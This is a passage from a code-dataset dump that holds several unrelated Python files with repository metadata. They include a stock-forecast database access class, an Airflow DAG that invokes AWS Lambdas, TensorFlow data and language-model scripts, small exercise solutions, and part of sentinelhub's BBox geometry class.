:\n\t\tElmGUI.uninstall(self,main_window)\n\t\tif len(self._action_bar.actions() ) > 0 :\n\t\t\tself.remove_bar(main_window,self._action_bar)\n\t\tif len(self._tool_bar.actions() ) > 0 :\n\t\t\tself.remove_bar(main_window,self._tool_bar)\n\n","repo_name":"jldinh/vplants","sub_path":"pglviewer/src/pglviewer/elm_gui.py","file_name":"elm_gui.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1567677417","text":"import pandas as pd\nfrom stocker_app.stock_database.schemas import database, Price_History, PredictionModel, ModelStatus, App_Setting\nfrom stocker_app.utils import database_utils as dbu\nfrom time import time\nclass DAO():\n def __init__(self):\n try:\n database.create_tables()\n self.session = database.get_session()\n except Exception as ex:\n print('failed to get session', ex)\n finally:\n print('DAO intialized')\n\n def set_setting(self, key, value):\n m_setting = self.session.query(App_Setting).filter(App_Setting.key == key).first()\n if m_setting != None:\n m_setting.value = value\n else:\n self.session.add(App_Setting(**{\n 'key': 'migration',\n 'value': value\n }))\n self.session.commit()\n \n def get_setting(self, key):\n m_setting = self.session.query(App_Setting).filter(App_Setting.key == key).first()\n if m_setting != None:\n return m_setting.value\n else:\n self.session.add(App_Setting(**{\n 'key': key,\n 'value': -1\n }))\n self.session.commit()\n return -1\n\n def convert_prediction_model(self, modelobj):\n return {\n 'hash_id': modelobj.id,\n 'start_date': modelobj.start_date,\n 'ticker': modelobj.ticker,\n 'prior': modelobj.prior,\n 'ma':modelobj.ma\n }\n\n def save_prediction_model(self, model_params, model):\n try:\n hash_id = model_params.get_hash()\n record = PredictionModel(**{\n 'model_id': hash_id,\n 'ticker': model_params.ticker,\n 'prediction_start': model_params.date,\n 'changepoint_prior_scale': model_params.changepoint_prior_scale,\n 'lag': model_params.lag,\n 'model_pkl': model,\n 'daily_seasonality':model_params.daily_seasonality,\n 'weekly_seasonality':model_params.weekly_seasonality,\n 'monthly_seasonality':model_params.monthly_seasonality,\n 'yearly_seasonality':model_params.yearly_seasonality,\n 'quarterly_seasonality':model_params.quarterly_seasonality,\n 'training_years': model_params.training_years\n })\n self.session.add(record)\n self.session.commit()\n if self.update_model_status(model_id = hash_id, status=1) == False:\n self.session.rollback()\n return False\n except Exception as ex:\n print(ex)\n self.session.rollback()\n return False\n finally:\n self.session.close()\n return True\n\n def update_model_status(self, model_id, status=0):\n try:\n status_db = self.session.query(ModelStatus).filter(ModelStatus.model_id == model_id).first()\n if status_db != None:\n status_db.status = status\n else:\n record = ModelStatus(**{\n 'model_id': model_id,\n 'status': status\n })\n self.session.add(record)\n self.session.commit()\n except Exception as ex:\n self.session.rollback()\n print('[Update Model Status]\\n', ex)\n return False\n finally:\n self.session.close()\n print('Update model %s as %s' %(model_id, status))\n return True\n\n def get_model_status(self, model_id):\n try:\n status_db = self.session.query(ModelStatus).filter(ModelStatus.model_id == model_id).first()\n if status_db != None:\n print('Status of %s: %s', status_db.model_id, status_db.status)\n return {\n 'model_id':status_db.model_id,\n 'status': status_db.status\n }\n else:\n self.update_model_status(model_id=model_id)\n return {\n 'model_id':model_id,\n 'status': 0\n }\n\n except Exception as ex:\n print(ex)\n return False\n \n def get_prediction_model(self, model_id):\n try:\n model = self.session.query(PredictionModel).filter(PredictionModel.model_id == model_id).first()\n if model == None:\n return None\n else:\n print('Model Queried Success:', model)\n return model\n except Exception as ex:\n print('Exception while geting predition model, mode_id: %s' %model_id, exec)\n finally:\n self.session.close()\n \n def get_prediction_models(self):\n try:\n query = self.session.query(PredictionModel)\n models=[]\n if models == None:\n return None\n else:\n models = pd.read_sql(query.statement, query.session.bind)\n print('Model List Queried Success:', models)\n return models\n except Exception as ex:\n print('Exception while geting predition model, mode_id')\n finally:\n self.session.close()\n return models\n\n def get_model_params(self, model_id):\n try:\n model = self.session.query(PredictionModel).filter(PredictionModel.model_id == model_id).first()\n if model == None:\n return None\n else:\n print('Model List Queried Success:', model)\n except Exception as ex:\n print('Exception while geting predition model, mode_id: %s' %model_id, exec)\n finally:\n self.session.close()\n return model","repo_name":"trungnguyen27/stock-forecast-service","sub_path":"stocker_app/stock_database/DAO.py","file_name":"DAO.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"786894245","text":"import json\nfrom airflow import DAG\nfrom datetime import datetime, timedelta, date\nfrom airflow.operators.python import PythonOperator\nimport boto3\nimport logging\n\ndefault_args = {\n \"owner\": \"seb\",\n \"email_on_failure\": \"false\",\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=1),\n # \"start_date\": datetime(2022, 7, 20),\n}\n\n\ndef dummy_function(ds, **kwargs):\n print(ds)\n x = 1\n\n\ndef trigger_extractor_lambda(ds, **kwargs):\n logging.info(ds)\n logging.info(date.fromisoformat(ds))\n lambdaclient = boto3.client(\"lambda\", \"us-east-1\")\n payload = {\n \"dates\": {\n \"start\": f\"{date.fromisoformat(ds)-timedelta(weeks=1)}\",\n \"end\": f\"{date.fromisoformat(ds)}\",\n }\n }\n lambdaclient.invoke(\n FunctionName=\"ufc-extractor\",\n InvocationType=\"Event\",\n Payload=json.dumps(payload),\n )\n\n\ndef trigger_t1_lambda(ds, **kwargs):\n lambdaclient = boto3.client(\"lambda\", \"us-east-1\")\n payload = {\n \"dates\": {\n \"start\": f\"{date.fromisoformat(ds)-timedelta(weeks=1)}\",\n \"end\": f\"{date.fromisoformat(ds)}\",\n }\n }\n lambdaclient.invoke(\n FunctionName=\"ufc-t1\",\n InvocationType=\"Event\",\n Payload=json.dumps(payload),\n )\n\n\nwith DAG(\n \"ufc-main-dag\",\n default_args=default_args,\n schedule_interval=\"@weekly\",\n catchup=True,\n start_date=datetime(1994, 1, 1),\n) as dag:\n dummy_task = PythonOperator(\n task_id=\"dummy_task\",\n python_callable=dummy_function,\n dag=dag,\n provide_context=True,\n )\n logging.info(\"ohai\")\n # lambda pulls raw data into S3\n extractor_task = PythonOperator(\n task_id=\"extractor_task\",\n python_callable=trigger_extractor_lambda,\n provide_context=True,\n dag=dag,\n )\n\n t1_task = PythonOperator(\n task_id=\"t1_task\",\n python_callable=trigger_t1_lambda,\n provide_context=True,\n dag=dag,\n )\n\n # run tests against structure of raw data\n\n # lambda runs first transformation\n\n # run tests great expectations\n\n # lambda creates temp tables and gets redshift to pull data into first table\n\n # lambda massages data into final format\n\n # run tests against great expetations\n\n # merge into normal data\n\n # refresh materialized views\n\ndummy_task >> extractor_task >> t1_task\n","repo_name":"chamley/UFC","sub_path":"src/airflow/main-dag.py","file_name":"main-dag.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18704185314","text":"change = eval(input('Enter change: '))\n\nquarters = change // 25\nchange %= 25\n\ndimes = change // 10\nchange %= 10\n\nnickels = change // 5\nchange %= 5\n\npennies = change // 1\n\nprint('Quarter: ', quarters)\nprint('Dimes: ', dimes)\nprint('Nickels: ', nickels)\nprint('Pennies: ', pennies)","repo_name":"MoMagdy14/advanced-programming-python","sub_path":"Chapter_03_Numbers/exercise_18.py","file_name":"exercise_18.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"2041009729","text":"\"\"\"\nCapsule Networks as Recurrent Models of Grouping and Segmentation\n\nExperiment 2: The role of recurrent processing\n\nThis script creates tfrecords files based on the stim_maker_fn class\n(see batchmaker.py).\nThe tfrecords files are called in the input_fn of the Estimator API\n(see capser_input_fn.py).\n\nThis code is inspired by the following youtube-video and code. Have a look if\nyou want to understand the details.\nhttps://www.youtube.com/watch?v=oxrcZ9uUblI\nhttps://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/18_TFRecords_Dataset_API.ipynb\n\n@author: Lynn Schmittwilken\n\"\"\"\n\nimport sys\nimport os\nimport tensorflow as tf\nimport numpy as np\nfrom parameters import parameters\nfrom batchmaker import stim_maker_fn\n\n\n##################################\n# Extra parameters: #\n##################################\ntraining = 0\ntesting = 1\ntesting_crowding = 1\n\n# Choose how many conditions should be included\nn_idx = parameters.n_idx\n\n\n##################################\n# Helper functions: #\n##################################\ndef wrap_int64(value):\n output = tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n return output\n\ndef wrap_bytes(value):\n output = tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n return output\n\ndef print_progress(count, total):\n percent_complete = float(count) / total\n msg = \"\\r- Progress: {0:.1%}\".format(percent_complete)\n # Print it.\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n\n##################################\n# tfrecords function: #\n##################################\ndef make_tfrecords(out_path, stim_maker, state, shape_types, n_samples,\n train_procedure='random', stim_idx=None, reduce_df=False):\n '''\n Function to create tfrecord files based on stim_maker class\n \n Parameters\n ----------\n out_path: string\n Full data path including file name to which the dataset should be\n saved, e.g. 'datapath/filename.tfrecords'\n stim_maker: class\n Output of stim_maker_fn defined in batchmaker.py which defines\n the train and test stimuli\n state: string\n Tell the network whether it should create a training or test dataset\n by using either state='training' or state='testing'\n shape_types: list of ints\n Pass a list with all shapeIDs corresponding to stim_maker class.\n For training, it must be continuous from 0 to max\n train_procedure: string\n Train procedure determines which and how many stimuli are\n used for training. In this project, always use\n train_procedure='random' in which case only shape_1 is\n used for training and gets randomly selected from all\n shape_types\n n_samples: int\n Full sample size of dataset\n stim_idx: int\n Based on the stim_idx, a test condition can be chosen. If\n stim_idx=None, a random condition is used. If stim_idx=0 the\n vernier-alone condition is chosen; if stim_idx=1 the crowding\n condition is chosen (=single flanker condition); if stim_idx=2 the\n uncrowding condition is chosen (multiple flankers condition either\n using flankers of one or two different types); if stim_idx=3 the\n control condition is chosen (no-crowding condition due to\n sufficient spacing between flankers and vernier)\n reduce_df: reduce_df: bool\n If reduce_df=False the stimulus group is placed randomly within\n the image. If reduce_df=True the stimulus group is still randomly\n placed within the image, however, the possibility of placement on\n the x-axis is controlled for the number of shape repetitions.\n Like this, it gets prevented that big stimulus groups are detected\n more easily just because their positioning on the x-axis is less\n variable\n '''\n \n print(\"\\nConverting: \" + out_path)\n \n # Open a TFRecordWriter for the output-file.\n with tf.python_io.TFRecordWriter(out_path) as writer:\n\n # Create images one by one using stim_maker and save them\n for i in range(n_samples):\n print_progress(count=i, total=n_samples - 1)\n \n # Either create training or testing dataset\n if state=='training':\n [shape_1_images, shape_2_images, shapelabels, vernierlabels, nshapeslabels,\n nshapeslabels_idx, x_shape_1, y_shape_1, x_shape_2, y_shape_2] = stim_maker.makeTrainBatch(\n shape_types, 1, train_procedure, reduce_df)\n\n elif state=='testing':\n # The shape_types involve all configs in a dict (see parameters.py)\n test_configs = shape_types\n if len(test_configs) == 1:\n # Either use the single test_config that is given:\n config_idx = list(test_configs)[0]\n chosen_config = test_configs[config_idx]\n else:\n # Or chose one config randomly from all configs given for\n # the validation set:\n config_idx = np.random.randint(0, len(test_configs))\n chosen_config = test_configs[str(config_idx)]\n\n [shape_1_images, shape_2_images, shapelabels, vernierlabels, nshapeslabels,\n nshapeslabels_idx, x_shape_1, y_shape_1, x_shape_2, y_shape_2] = stim_maker.makeTestBatch(\n chosen_config, 1, stim_idx, reduce_df)\n\n # Convert the image to raw bytes.\n # Note: for this project, not all variables are needed\n shape_1_images_bytes = shape_1_images.tostring()\n shape_2_images_bytes = shape_2_images.tostring()\n shapelabels_bytes = shapelabels.tostring()\n nshapeslabels_bytes = nshapeslabels.tostring()\n nshapeslabels_idx_bytes = nshapeslabels_idx.tostring()\n vernierlabels_bytes = vernierlabels.tostring()\n x_shape_1_bytes = x_shape_1.tostring()\n y_shape_1_bytes = y_shape_1.tostring()\n x_shape_2_bytes = x_shape_2.tostring()\n y_shape_2_bytes = y_shape_2.tostring()\n\n # Create a dict with the data to save in the TFRecords file\n data = {'shape_1_images': wrap_bytes(shape_1_images_bytes),\n 'shape_2_images': wrap_bytes(shape_2_images_bytes),\n 'shapelabels': wrap_bytes(shapelabels_bytes),\n 'nshapeslabels': wrap_bytes(nshapeslabels_bytes),\n 'nshapeslabels_idx': wrap_bytes(nshapeslabels_idx_bytes),\n 'vernierlabels': wrap_bytes(vernierlabels_bytes),\n 'x_shape_1': wrap_bytes(x_shape_1_bytes),\n 'y_shape_1': wrap_bytes(y_shape_1_bytes),\n 'x_shape_2': wrap_bytes(x_shape_2_bytes),\n 'y_shape_2': wrap_bytes(y_shape_2_bytes)}\n\n # Wrap the data as TensorFlow Features.\n feature = tf.train.Features(feature=data)\n\n # Wrap again as a TensorFlow Example.\n example = tf.train.Example(features=feature)\n\n # Serialize the data.\n serialized = example.SerializeToString()\n\n # Write the serialized data to the TFRecords file.\n writer.write(serialized)\n return\n\n\n###################################\n# Create tfrecords files: #\n###################################\nprint('\\n-------------------------------------------------------')\nprint('Creating tfrecords files of type:', parameters.train_procedure)\n\nstim_maker = stim_maker_fn(parameters.im_size, parameters.shape_size, parameters.bar_width, parameters.offset)\n\nif not os.path.exists(parameters.data_path):\n os.mkdir(parameters.data_path)\n\n\n# Create the training set:\nif training:\n mode = 'training'\n shape_types_train = parameters.shape_types\n train_procedure = 'random'\n make_tfrecords(parameters.train_data_path, stim_maker, mode, shape_types_train,\n parameters.n_train_samples, train_procedure, reduce_df=parameters.reduce_df)\n print('\\n-------------------------------------------------------')\n print('Finished creation of training set')\n print('-------------------------------------------------------')\n\n\n# Create the validation and the test set that uses the same stimuli as in\n# the training set:\nif testing:\n mode = 'training'\n shape_types_train = parameters.shape_types\n train_procedure = 'random'\n\n # Validation set:\n make_tfrecords(parameters.val_data_path, stim_maker, mode, shape_types_train,\n parameters.n_test_samples, train_procedure, reduce_df=parameters.reduce_df)\n\n # Individual test sets:\n for i in range(len(parameters.test_data_paths)):\n # We use +1 here to skip a vernier-vernier configuration\n chosen_shape = shape_types_train[i+1]\n test_file_path = parameters.test_data_paths[i]\n make_tfrecords(test_file_path, stim_maker, mode, chosen_shape,\n parameters.n_test_samples, train_procedure, reduce_df=parameters.reduce_df)\n print('\\n-------------------------------------------------------')\n print('Finished creation of regular validation and test sets')\n print('-------------------------------------------------------')\n\n\n# Create the validation and the test set that uses vernier-alone and flankers\n# test stimuli:\nif testing_crowding:\n mode = 'testing'\n test_configs = parameters.test_configs[0]\n \n # Validation sets:\n make_tfrecords(parameters.val_crowding_data_path, stim_maker, mode, test_configs,\n parameters.n_test_samples, reduce_df=parameters.reduce_df)\n\n # Individual test sets:\n for i in range(len(test_configs)):\n test_config = {str(i): test_configs[str(i)]}\n test_data_path = parameters.test_crowding_data_paths[i]\n if not os.path.exists(test_data_path):\n os.mkdir(test_data_path)\n for stim_idx in range(n_idx):\n test_file_path = test_data_path + '/' + str(stim_idx) + '.tfrecords'\n make_tfrecords(test_file_path, stim_maker, mode, test_config,\n parameters.n_test_samples, stim_idx=stim_idx, \n reduce_df=parameters.reduce_df)\n print('\\n-------------------------------------------------------')\n print('Finished creation of crowding validaton and test sets')\n print('-------------------------------------------------------')\n","repo_name":"adriendoerig/Capsule-networks-as-recurrent-models-of-grouping-and-segmentation","sub_path":"experiment2/make_tfrecords.py","file_name":"make_tfrecords.py","file_ext":"py","file_size_in_byte":10700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73619855593","text":"import tensorflow as tf\nimport numpy as np\n\nclass LanguageModel:\n def __init__(self, args, infer=False):\n\n import tensorflow as tf\n from tensorflow.python.ops import seq2seq, rnn_cell\n\n if infer:\n args.batch_size = 1\n args.seq_length = 1\n\n gru = rnn_cell.GRUCell(args.rnn_state_size)\n self.cell = rnn_cell.MultiRNNCell([gru] * args.stacked_rnn_layers)\n\n self.input_data = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) # [batch_size, seq_length]\n self.targets = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) # [batch_size, seq_length]\n self.initial_state = self.cell.zero_state(args.batch_size, tf.float32) # [batch_size]\n\n with tf.variable_scope('rnnlm'):\n softmax_w = tf.get_variable(\"softmax_w\", [args.rnn_state_size, args.vocab_size]) # [rnn_state_size, vocab_size]\n softmax_b = tf.get_variable(\"softmax_b\", [args.vocab_size]) # [vocab_size]\n\n word_embedding = tf.get_variable(\"embedding\", [args.vocab_size, args.rnn_state_size]) # [vocab_size, rnn_state_size]\n inputs = tf.split(1, args.seq_length, tf.nn.embedding_lookup(word_embedding, self.input_data))\n inputs = [tf.squeeze(input_, [1]) for input_ in inputs]\n\n def loop(prev, _): # [batch_size, rnn_state_size]\n prev = tf.matmul(prev, softmax_w) + softmax_b # [batch_size, vocab_size]\n prev_symbol = tf.stop_gradient(tf.argmax(prev, 1)) # [batch_size]\n return tf.nn.embedding_lookup(word_embedding, prev_symbol)\n\n outputs, last_state = seq2seq.rnn_decoder(inputs, self.initial_state, self.cell, loop_function=loop if infer else None, scope='rnnlm')\n # outputs: [batch_size, rnn_state_size] * seq_length\n\n output = tf.reshape(tf.concat(1, outputs), [-1, args.rnn_state_size])\n\n self.logits = tf.matmul(output, softmax_w) + softmax_b # [batch_size * seq_length, vocab_size]\n self.probs = tf.nn.softmax(self.logits)\n\n\n\n loss = seq2seq.sequence_loss_by_example([self.logits],\n [tf.reshape(self.targets, [-1])], # [batch_size * seq_length]\n [tf.ones([args.batch_size * args.seq_length])],\n args.vocab_size)\n\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.cost = tf.reduce_sum(loss) / args.batch_size / args.seq_length\n\n tf.summary.scalar(\"cost\", self.cost)\n\n self.final_state = last_state\n self.lr = tf.Variable(0.0, trainable=False)\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars), args.grad_clip)\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=self.global_step)\n\n\n\n def sample(self, sess, chars, vocab, num=200, prime='私は', sampling_type=1) -> str:\n state = self.cell.zero_state(1, tf.float32).eval()\n for char in prime[:-1]:\n x = np.zeros((1, 1))\n x[0, 0] = vocab[char]\n feed = {self.input_data: x, self.initial_state:state}\n [state] = sess.run([self.final_state], feed)\n\n def weighted_pick(weights):\n t = np.cumsum(weights)\n s = np.sum(weights)\n return(int(np.searchsorted(t, np.random.rand(1)*s)))\n\n ret = prime\n char = prime[-1]\n for n in range(num):\n x = np.zeros((1, 1))\n x[0, 0] = vocab.get(char)\n feed = {self.input_data: x, self.initial_state:state}\n [probs, state] = sess.run([self.probs, self.final_state], feed)\n p = probs[0]\n\n if sampling_type == 0:\n sample = np.argmax(p)\n elif sampling_type == 2:\n if char == ' ':\n sample = weighted_pick(p)\n else:\n sample = np.argmax(p)\n else: # sampling_type == 1 default:\n sample = weighted_pick(p)\n\n pred = chars[sample]\n ret += pred\n char = pred\n\n return ret\n\n\n\n\ndef run():\n #train()\n sample()\n\n","repo_name":"alatani/midi_gen","sub_path":"deepdazai_old/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15141212889","text":"def main(l):\r\n counts = {}\r\n answer = 0\r\n for nb in l:\r\n counts[nb] = counts.get(nb, 0) + 1\r\n for a in sorted(counts.keys(), reverse=True):\r\n b = (1 << a.bit_length()) - a\r\n c_a = counts[a]\r\n c_b = counts.get(b)\r\n if c_b:\r\n if a == b:\r\n answer += c_a // 2\r\n else:\r\n increment = c_a if c_a < c_b else c_b\r\n counts[a] -= increment\r\n counts[b] -= increment\r\n answer += increment\r\n\r\n return answer\r\n\r\n\r\nif __name__ == '__main__':\r\n input()\r\n print(main(map(int, input().split())))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/B/4182040.py","file_name":"4182040.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"447155320","text":"\"\"\"Module implementing geometry classes.\"\"\"\n\nfrom __future__ import annotations\n\nimport contextlib\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nfrom math import ceil\nfrom typing import Callable, Dict, Iterator, Tuple, TypeVar, Union\n\nimport shapely.geometry\nimport shapely.geometry.base\nimport shapely.ops\nimport shapely.wkt\nfrom shapely.errors import GeometryTypeError\nfrom shapely.geometry import MultiPolygon, Polygon\nfrom typing_extensions import TypeAlias\n\nfrom .constants import CRS\nfrom .exceptions import SHDeprecationWarning\nfrom .geo_utils import transform_point\n\nSelf = TypeVar(\"Self\", bound=\"_BaseGeometry\")\nBBoxInputType: TypeAlias = Union[\n Tuple[float, float, float, float], Tuple[Tuple[float, float], Tuple[float, float]], Dict[str, float]\n]\n\n\nclass _BaseGeometry(metaclass=ABCMeta):\n \"\"\"Base geometry class\"\"\"\n\n def __init__(self, crs: CRS):\n \"\"\"\n :param crs: Coordinate reference system of the geometry\n \"\"\"\n self._crs = CRS(crs)\n\n @property\n def crs(self) -> CRS:\n \"\"\"Returns the coordinate reference system (CRS)\n\n :return: Coordinate reference system Enum\n \"\"\"\n return self._crs\n\n @property\n @abstractmethod\n def geometry(self) -> Polygon | MultiPolygon:\n \"\"\"An abstract property - every subclass must implement geometry property\"\"\"\n\n @property\n def geojson(self) -> dict:\n \"\"\"Returns representation in a GeoJSON format. Use `json.dump` for writing it to file.\n\n :return: A dictionary in GeoJSON format\n \"\"\"\n return self.get_geojson(with_crs=True)\n\n def get_geojson(self, with_crs: bool = True) -> dict:\n \"\"\"Returns representation in a GeoJSON format. Use `json.dump` for writing it to file.\n\n :param with_crs: A flag indicating if GeoJSON dictionary should contain CRS part\n :return: A dictionary in GeoJSON format\n \"\"\"\n geometry_geojson = shapely.geometry.mapping(self.geometry)\n\n if with_crs:\n return {**self._crs_to_geojson(), **geometry_geojson}\n return geometry_geojson\n\n def _crs_to_geojson(self) -> dict:\n \"\"\"Helper method which generates part of GeoJSON format related to CRS\"\"\"\n return {\"crs\": {\"type\": \"name\", \"properties\": {\"name\": f\"urn:ogc:def:crs:EPSG::{self.crs.value}\"}}}\n\n @property\n def wkt(self) -> str:\n \"\"\"Transforms geometry object into `Well-known text` format\n\n :return: string in WKT format\n \"\"\"\n return self.geometry.wkt\n\n @abstractmethod\n def transform(self: Self, crs: CRS, always_xy: bool = True) -> Self:\n \"\"\"Transforms geometry from current CRS to target CRS.\"\"\"\n\n @abstractmethod\n def apply(self: Self, operation: Callable[[float, float], tuple[float, float]]) -> Self:\n \"\"\"Applies a function to each vertex of a geometry object.\"\"\"\n\n\nclass BBox(_BaseGeometry):\n \"\"\"Class representing a bounding box in a given CRS.\n\n Throughout the sentinelhub package this class serves as the canonical representation of a bounding box. It can be\n initialized from multiple representations:\n\n 1) `((min_x, min_y), (max_x, max_y))`\n 2) `(min_x, min_y, max_x, max_y)`\n 3) `{\"min_x\": min_x, \"max_x\": max_x, \"min_y\": min_y, \"max_y\": max_y}`\n\n In the above\n Note that BBox coordinate system depends on `crs` parameter:\n\n - In case of `constants.CRS.WGS84` axis x represents longitude and axis y represents latitude.\n - In case of `constants.CRS.POP_WEB` axis x represents easting and axis y represents northing.\n - In case of `constants.CRS.UTM_*` axis x represents easting and axis y represents northing.\n \"\"\"\n\n def __init__(self, bbox: BBoxInputType, crs: CRS):\n \"\"\"\n :param bbox: A bbox in any valid representation\n :param crs: Coordinate reference system of the bounding box\n \"\"\"\n x_fst, y_fst, x_snd, y_snd = self._to_tuple(bbox)\n self.min_x, self.max_x = min(x_fst, x_snd), max(x_fst, x_snd)\n self.min_y, self.max_y = min(y_fst, y_snd), max(y_fst, y_snd)\n\n super().__init__(crs)\n\n @classmethod\n def _to_tuple(cls, bbox: BBoxInputType) -> tuple[float, float, float, float]:\n \"\"\"Converts the input bbox representation (see the constructor docstring for a list of valid representations)\n into a flat tuple. Also supports `list` objects in places where `tuple` is expected.\n\n :param bbox: A bbox in one of the forms listed in the class description.\n :return: A flat tuple `(min_x, min_y, max_x, max_y)`\n :raises: TypeError\n \"\"\"\n if isinstance(bbox, (tuple, list)):\n return cls._tuple_from_list_or_tuple(bbox)\n if isinstance(bbox, str): # type: ignore[unreachable]\n return cls._tuple_from_str(bbox) # type: ignore[unreachable]\n if isinstance(bbox, dict):\n return cls._tuple_from_dict(bbox)\n if isinstance(bbox, BBox): # type: ignore[unreachable]\n return cls._tuple_from_bbox(bbox)\n if isinstance(bbox, shapely.geometry.base.BaseGeometry):\n warnings.warn(\n \"Initializing `BBox` objects from `shapely` geometries will no longer be possible in future\"\n \" versions. Use the `bounds` property of the `shapely` geometry to initialize the `BBox` instead.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n return bbox.bounds\n raise TypeError(\n \"Unable to process `BBox` input. Provide `(min_x, min_y, max_x, max_y)` or check documentation for other\"\n \" valid forms of input.\"\n )\n\n @staticmethod\n def _tuple_from_list_or_tuple(\n bbox: tuple[float, float, float, float] | tuple[tuple[float, float], tuple[float, float]]\n ) -> tuple[float, float, float, float]:\n \"\"\"Converts a list or tuple representation of a bbox into a flat tuple representation.\n\n :param bbox: a list or tuple with 4 coordinates that is either flat or nested\n :return: tuple (min_x, min_y, max_x, max_y)\n :raises: TypeError\n \"\"\"\n if len(bbox) == 4:\n min_x, min_y, max_x, max_y = bbox\n else:\n (min_x, min_y), (max_x, max_y) = bbox\n return float(min_x), float(min_y), float(max_x), float(max_y)\n\n @staticmethod\n def _tuple_from_str(bbox: str) -> tuple[float, float, float, float]:\n \"\"\"Parses a string of numbers separated by any combination of commas and spaces\n\n :param bbox: e.g. str of the form `min_x ,min_y max_x, max_y`\n :return: tuple (min_x,min_y,max_x,max_y)\n \"\"\"\n warnings.warn(\n \"Initializing `BBox` objects from strings will no longer be possible in future versions.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n string_parts = bbox.replace(\",\", \" \").split()\n if len(string_parts) != 4:\n raise ValueError(f\"Input {bbox} is not a valid string representation of a BBox.\")\n min_x, min_y, max_x, max_y = map(float, string_parts)\n return min_x, min_y, max_x, max_y\n\n @staticmethod\n def _tuple_from_dict(bbox: dict) -> tuple[float, float, float, float]:\n \"\"\"Converts a dictionary representation of a bbox into a flat tuple representation\n\n :param bbox: a dict with keys \"min_x, \"min_y\", \"max_x\", and \"max_y\"\n :return: tuple (min_x,min_y,max_x,max_y)\n :raises: KeyError\n \"\"\"\n return bbox[\"min_x\"], bbox[\"min_y\"], bbox[\"max_x\"], bbox[\"max_y\"]\n\n @staticmethod\n def _tuple_from_bbox(bbox: BBox) -> tuple[float, float, float, float]:\n \"\"\"Converts a BBox instance into a tuple\n\n :param bbox: An instance of the BBox type\n :return: tuple (min_x, min_y, max_x, max_y)\n \"\"\"\n warnings.warn(\n \"Initializing `BBox` objects from `BBox` objects will no longer be possible in future versions.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n return bbox.lower_left + bbox.upper_right\n\n def __iter__(self) -> Iterator[float]:\n \"\"\"This method enables iteration over coordinates of bounding box\"\"\"\n return iter(self.lower_left + self.upper_right)\n\n def __repr__(self) -> str:\n \"\"\"Class representation\"\"\"\n return f\"{self.__class__.__name__}(({self.lower_left}, {self.upper_right}), crs={self.crs!r})\"\n\n def __str__(self, reverse: bool = False) -> str:\n \"\"\"Transforms bounding box into a string of coordinates\n\n :param reverse: `True` if x and y coordinates should be switched and `False` otherwise\n :return: String of coordinates\n \"\"\"\n warnings.warn(\n \"The string representation of `BBox` will change to match its `repr` representation.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n if reverse:\n return f\"{self.min_y},{self.min_x},{self.max_y},{self.max_x}\"\n return f\"{self.min_x},{self.min_y},{self.max_x},{self.max_y}\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Method for comparing two bounding boxes\n\n :param other: Another bounding box object\n :return: `True` if bounding boxes have the same coordinates and the same CRS and `False otherwise\n \"\"\"\n if isinstance(other, BBox):\n return list(self) == list(other) and self.crs is other.crs\n return False\n\n @property\n def lower_left(self) -> tuple[float, float]:\n \"\"\"Returns the lower left vertex of the bounding box\n\n :return: min_x, min_y\n \"\"\"\n return self.min_x, self.min_y\n\n @property\n def upper_right(self) -> tuple[float, float]:\n \"\"\"Returns the upper right vertex of the bounding box\n\n :return: max_x, max_y\n \"\"\"\n return self.max_x, self.max_y\n\n @property\n def middle(self) -> tuple[float, float]:\n \"\"\"Returns the middle point of the bounding box\n\n :return: middle point\n \"\"\"\n return (self.min_x + self.max_x) / 2, (self.min_y + self.max_y) / 2\n\n def reverse(self) -> BBox:\n \"\"\"Returns a new BBox object where x and y coordinates are switched\n\n :return: New BBox object with switched coordinates\n \"\"\"\n return BBox((self.min_y, self.min_x, self.max_y, self.max_x), crs=self.crs)\n\n def transform(self, crs: CRS, always_xy: bool = True) -> BBox:\n \"\"\"Transforms BBox from current CRS to target CRS\n\n This transformation will take lower left and upper right corners of the bounding box, transform these 2 points\n and define a new bounding box with them. The resulting bounding box might not completely cover the original\n bounding box but at least the transformation is reversible.\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. The default value `True` is in most cases the correct one.\n :return: Bounding box in target CRS\n \"\"\"\n new_crs = CRS(crs)\n return BBox(\n (\n transform_point(self.lower_left, self.crs, new_crs, always_xy=always_xy),\n transform_point(self.upper_right, self.crs, new_crs, always_xy=always_xy),\n ),\n crs=new_crs,\n )\n\n def transform_bounds(self, crs: CRS, always_xy: bool = True) -> BBox:\n \"\"\"Alternative way to transform BBox from current CRS to target CRS.\n\n This transformation will transform the bounding box geometry to another CRS 